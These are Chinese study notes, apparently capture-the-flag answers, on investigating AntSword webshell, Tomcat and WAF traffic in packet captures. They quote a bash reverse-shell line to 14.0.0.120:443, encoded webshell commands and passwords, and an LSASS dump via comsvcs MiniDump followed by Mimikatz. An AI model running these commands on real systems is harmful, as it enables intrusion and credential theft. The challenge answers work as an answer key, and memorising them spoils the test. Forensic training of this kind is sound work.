1
第六章 流量特征分析-蚁剑流量分析
1.木马的连接密码是多少
2.黑客执行的第一个命令是什么
3.黑客读取了哪个文件的内容,提交文件绝对路径
4.黑客上传了什么文件到服务器,提交文件名
5.黑客上传的文件内容是什么
6.黑客下载了哪个文件,提交文件绝对路径
下载后直接看HTTP协议,HTTP追踪流,请求体中,1=xxx,因此连接密码为1
点击最下面的value,show packet bytes base64解码,从第二个开始:cd
蚁剑在编码前加两位随机字符主要是为了提升Payload的变异性和复杂性,从而更有效地绕过安全检测。
“/var/www/html”;id;echo e124bc;pwd;echo 43523
3 /var/www/html/flag.txt
追踪第四条流量的http流,将post内容url解码,看到fwrite函数,以及对应的传参关系,然后将传参解码得到flag{flag.txt}
4 /var/www/html/1.php
/var/www/html/7
/var/www/html/config.php
Form item: “ucc3f8650c92ac” = “AkY2QgIi92YXIvd3d3L2h0bWwiO2lkO2VjaG8gZTEyNGJjO3B3ZDtlY2hvIDQzNTIz”
38L2Jpbi9zaA==
1
1、黑客的IP是什么?
2、黑客是通过什么漏洞进入服务器的?(提交CVE编号)
3、黑客上传的木马文件名是什么?(提交文件名)
4、黑客上传的木马连接密码是什么?
5、黑客上传的木马解密密钥是什么?
6、黑客连接webshell后执行的第一条命令是什么?
7、黑客连接webshell时查询当前shell的权限是什么?
8、黑客利用webshell执行命令查询服务器Linux系统发行版本是什么?
9、黑客利用webshell执行命令还查询并过滤了什么?(提交整条执行成功的命令)
10、黑客留下后门的反连的IP和PORT是什么?(IP:PORT)
11、黑客通过什么文件留下了后门?
12、黑客设置的后门密码是什么?
13、黑客的恶意dnslog服务器地址是什么?
查看ip,较少的为黑客ip 192.168.31.190
3 hello.jsp
4 7f0e6f
5 1710acba6220f62b
第六章 流量特征分析-常见攻击事件 tomcat wp
网络数据包分析
扫描行为的IP:翻数据包查IP
IP反查位置
端口提供Web管理界面:admin
攻击工具:扫描时用的工具在数据包中写明
暴力破解成功的用户及密码:login看数据包 Authorization: Basic <Base64编码的用户名和密码>
反弹shell恶意文件名称:POST数据包,看HTTP追踪流
维持提权后的特殊信息: tcp contains “/bin”
/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1':在bash中执行反向Shell连接到IP14.0.0.120的443端口。- crontab -i cron
或者查定时任务
第六章 流量特征分析-蚂蚁爱上树
Waf流量分析
- 管理员Admin账号的密码是什么?
- LSASS.exe的程序进程ID是多少?
- 用户WIN101的密码是什么?
1password没找到,蚁剑base64,所以找POST数据包,从大到小看,显示分组字节,从1开始解码「不了解为什么和另一道普通的蚁剑题目的开始解码位置不同,直接搜索没搜到」,admin添加到本地管理员组,
2LSASS比较复杂,rundll32.exe 被用来调用 comsvcs.dll 中的 MiniDump 函数,生成一个包含系统账户和密码信息的 lsass.dmp 文件。
3提取dmp文件,hex删除后添加后缀,Mimikatz提取密码md5后在线网站解密